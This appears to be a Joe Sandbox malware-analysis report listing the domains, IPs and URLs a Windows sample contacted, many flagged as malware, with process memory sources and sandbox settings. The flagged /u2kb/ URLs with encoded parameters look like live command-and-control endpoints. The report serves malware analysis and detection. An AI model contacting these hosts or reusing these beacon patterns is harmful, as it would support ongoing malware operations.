          NameIPActiveMaliciousAntivirus DetectionReputation
          www.bitservicesltd.com
          		161.97.163.8
          		truetrueunknown
          www.younrock.com
          		81.17.29.149
          		truetrueunknown
          www.energyservicestation.com
          		213.145.228.111
          		truetrueunknown
          www.thewildphotographer.co.uk
          		72.14.185.43
          		truetrueunknown
          www.shapshit.xyz
          		199.192.30.147
          		truetrue
            		unknown
            www.222ambking.org
            		91.195.240.94
            		truetrue
              		unknown
              thedivinerudraksha.com
              		85.187.128.34
              		truetrue
                		unknown
                un-object.com
                		192.185.17.12
                		truetrue
                  		unknown
                  white-hat.uk
                  		94.176.104.86
                  		truetrue
                    		unknown
                    gritslab.com
                    		78.141.192.145
                    		truetrue
                      		unknown
                      www.un-object.com
                      		unknown
                      		unknowntrue
                        		unknown
                        www.white-hat.uk
                        		unknown
                        		unknowntrue
                          		unknown
                          www.gritslab.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.thedivinerudraksha.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.fclaimrewardccpointq.shop
                              		unknown
                              		unknowntrue
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://www.thedivinerudraksha.com/u2kb/true
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.energyservicestation.com/u2kb/true
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.gritslab.com/u2kb/?X51Qjm=ydCzFiH7iMWnz6xHMre3IWaEcfnK5+fYQUsmgPEoYCSsyD6HgT3yZXCBsea1O+OKnOGwPNRrrKn2ANadQmZuoq3zmdf3x1nRXg==&w6DN_=E0EQSM0RCb349ptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.un-object.com/u2kb/true
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.shapshit.xyz/u2kb/?X51Qjm=Yd5Rzn4EVOpL1Cl/e5Amzdaa+E7UlYBpl8BtE0ZhlgLGbR5cH1Fns9iDSFPM0EqDoX1il4mP+EMsdt2zebBg7FEeCQ3NU/ifUg==&w6DN_=E0EQSM0RCb349ptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.thewildphotographer.co.uk/u2kb/true
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.bitservicesltd.com/u2kb/true
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.energyservicestation.com/u2kb/?X51Qjm=IK59b/MdFRha+CUVMWpzDpHQ2riuD6F66TLC1fPPNwLnZq29gpb12AWvlZbo17UEh0sBgFvevrMQsuZfYKuAI0Y2tVIkdALeFw==&w6DN_=E0EQSM0RCb349ptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.gritslab.com/u2kb/true
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.bitservicesltd.com/u2kb/?X51Qjm=rr+sOBvEXsBdGevUkZEAvniGWrNxzC1YNHmXivr92FQhRIIYsedRhL+YGaN2VCieGtjtLTUTzUqxDX3Wf7WovfMRM9ceCuTm3Q==&w6DN_=E0EQSM0RCb349ptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.shapshit.xyz/u2kb/true
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.white-hat.uk/u2kb/?X51Qjm=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0IyZUuXLnrTzZCke5/3g9z1JjJjKyNNZNw==&w6DN_=E0EQSM0RCb349ptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.222ambking.org/u2kb/?X51Qjm=IEUpLmGg2fqLmrhwDd0CH8vm0i8ubOQDFcodV2ACJcW4bHSQscR3aN4MRDv2q1O0g2vnwuasF99orDvyVUehJPYRcFQEZ60O6g==&w6DN_=E0EQSM0RCb349ptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.222ambking.org/u2kb/true
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.younrock.com/u2kb/?X51Qjm=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm6Scj5xbzg3GdXyuHgSKqxyFLAdmHecJKz/g==&w6DN_=E0EQSM0RCb349ptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.younrock.com/u2kb/true
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.thedivinerudraksha.com/u2kb/?X51Qjm=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pROq8Gck3yLtOH/fXnE++yuD9U7pvtIMkBqNJDo2oag==&w6DN_=E0EQSM0RCb349ptrue
                                • Avira URL Cloud: malware
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://duckduckgo.com/chrome_newtabcmstp.exe, 00000006.00000003.402261377.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.6.drfalse
                                  		high
                                  http://www.avisrezervee.com/u2kb/www.avisrezervee.comexplorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://duckduckgo.com/ac/?q=HI4NJ046K.6.drfalse
                                    		high
                                    http://www.gritslab.com/u2kb/www.gritslab.comexplorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://www.name.com/domain/renew/222ambking.org?utm_source=Sedo_parked_page&utm_medium=button&utm_cexplorer.exe, 00000004.00000002.583702124.00000000159DC000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.569660808.000000000542C000.00000004.10000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.570208700.0000000007150000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://img.sedoparking.comexplorer.exe, 00000004.00000002.583702124.00000000159DC000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.569660808.000000000542C000.00000004.10000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.570208700.0000000007150000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://search.yahoo.com?fr=crmas_sfpfcmstp.exe, 00000006.00000003.402261377.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.6.drfalse
                                          		high
                                          http://www.thewildphotographer.co.uk/u2kb/www.thewildphotographer.co.ukexplorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.younrock.com/u2kb/?X51Qjm=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wmcmstp.exe, 00000006.00000002.570208700.0000000007150000.00000004.00000800.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.mygloballojistik.onlineexplorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.shapshit.xyzexplorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.germanreps.comexplorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.ecomofietsen.comexplorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.thedivinerudraksha.comexplorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.white-hat.uk/u2kb/www.white-hat.ukexplorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.energyservicestation.com/u2kb/www.energyservicestation.comexplorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://white-hat.uk/u2kb/?X51Qjm=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0Iyexplorer.exe, 00000004.00000002.583702124.0000000015526000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.569660808.0000000004F76000.00000004.10000000.00040000.00000000.sdmptrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.white-hat.ukexplorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.employerseervices.com/u2kb/www.employerseervices.comexplorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.dzyngiri.comexplorer.exe, 00000004.00000002.583702124.0000000016024000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.569660808.0000000005A74000.00000004.10000000.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.mygloballojistik.online/u2kb/explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.avisrezervee.comexplorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.bitservicesltd.comexplorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://justinmezzell.comexplorer.exe, 00000004.00000002.583702124.0000000016024000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.569660808.0000000005A74000.00000004.10000000.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.white-hat.uk/u2kb/explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          https://alldomains.hosting/domain-registrieren.htmlexplorer.exe, 00000004.00000002.583702124.0000000015B6E000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.569660808.00000000055BE000.00000004.10000000.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.gritslab.comexplorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.thewildphotographer.co.ukexplorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.fclaimrewardccpointq.shop/u2kb/www.fclaimrewardccpointq.shopexplorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.222ambking.org/u2kb/www.222ambking.orgexplorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.fclaimrewardccpointq.shop/u2kb/explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000004.00000003.561968971.000000000ED28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.566841892.0000000000921000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.344218674.000000000ED28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.580393358.000000000ED28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.320444720.000000000091F000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.energyservicestation.comexplorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icocmstp.exe, 00000006.00000003.402261377.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.6.drfalse
                                              		high
                                              http://www.employerseervices.com/u2kb/explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.younrock.comexplorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=HI4NJ046K.6.drfalse
                                                		high
                                                https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchcmstp.exe, 00000006.00000003.402261377.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.6.drfalse
                                                  		high
                                                  http://nsis.sf.net/NSIS_ErrorErroru8QPnVhq0N.exefalse
                                                    		high
                                                    http://www.un-object.com/u2kb/www.un-object.comexplorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.avisrezervee.com/u2kb/explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.mygloballojistik.online/u2kb/www.mygloballojistik.onlineexplorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=cmstp.exe, 00000006.00000003.402261377.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.6.drfalse
                                                      		high
                                                      http://www.thedivinerudraksha.com/u2kb/www.thedivinerudraksha.comexplorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      https://alldomains.hosting/explorer.exe, 00000004.00000002.583702124.0000000015B6E000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.569660808.00000000055BE000.00000004.10000000.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.fclaimrewardccpointq.shopexplorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      https://www.sedo.com/services/parking.php3cmstp.exe, 00000006.00000002.570208700.0000000007150000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://ac.ecosia.org/autocomplete?q=HI4NJ046K.6.drfalse
                                                          		high
                                                          https://search.yahoo.com?fr=crmas_sfpcmstp.exe, 00000006.00000003.402261377.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.6.drfalse
                                                            		high
                                                            http://www.ecomofietsen.com/u2kb/explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            https://alldomains.hosting/hosting-webhosting.htmlexplorer.exe, 00000004.00000002.583702124.0000000015B6E000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.569660808.00000000055BE000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.germanreps.com/u2kb/www.germanreps.comexplorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            http://www.germanreps.com/u2kb/explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            http://www.employerseervices.comexplorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.younrock.com/u2kb/www.younrock.comexplorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            http://www.222ambking.orgexplorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.shapshit.xyz/u2kb/www.shapshit.xyzexplorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            http://thedivinerudraksha.com/u2kb/?X51Qjm=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pRexplorer.exe, 00000004.00000002.583702124.00000000161B6000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.569660808.0000000005C06000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            http://www.ecomofietsen.com/u2kb/www.ecomofietsen.comexplorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            http://www.un-object.comexplorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=HI4NJ046K.6.drfalse
                                                              		high
                                                              http://www.bitservicesltd.com/u2kb/www.bitservicesltd.comexplorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              		unknown

                                                              World Map of Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public IPs

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              85.187.128.34
                                                              		thedivinerudraksha.comUnited States
                                                              		55293A2HOSTINGUStrue
                                                              91.195.240.94
                                                              		www.222ambking.orgGermany
                                                              		47846SEDO-ASDEtrue
                                                              78.141.192.145
                                                              		gritslab.comFrance
                                                              		20473AS-CHOOPAUStrue
                                                              161.97.163.8
                                                              		www.bitservicesltd.comUnited States
                                                              		51167CONTABODEtrue
                                                              81.17.29.149
                                                              		www.younrock.comSwitzerland
                                                              		51852PLI-ASCHtrue
                                                              192.185.17.12
                                                              		un-object.comUnited States
                                                              		46606UNIFIEDLAYER-AS-1UStrue
                                                              94.176.104.86
                                                              		white-hat.ukRomania
                                                              		5588GTSCEGTSCentralEuropeAntelGermanyCZtrue
                                                              213.145.228.111
                                                              		www.energyservicestation.comAustria
                                                              		25575DOMAINTECHNIKATtrue
                                                              72.14.185.43
                                                              		www.thewildphotographer.co.ukUnited States
                                                              		63949LINODE-APLinodeLLCUStrue
                                                              199.192.30.147
                                                              		www.shapshit.xyzUnited States
                                                              		22612NAMECHEAP-NETUStrue

                                                              General Information

                                                              Joe Sandbox Version:37.0.0 Beryl
                                                              Analysis ID:830804
                                                              Start date and time:2023-03-20 17:49:26 +01:00
                                                              Joe Sandbox Product:CloudBasic
                                                              Overall analysis duration:0h 11m 12s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:light
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                              Number of analysed new started processes analysed:9
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:1
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • HDC enabled
                                                              • AMSI enabled
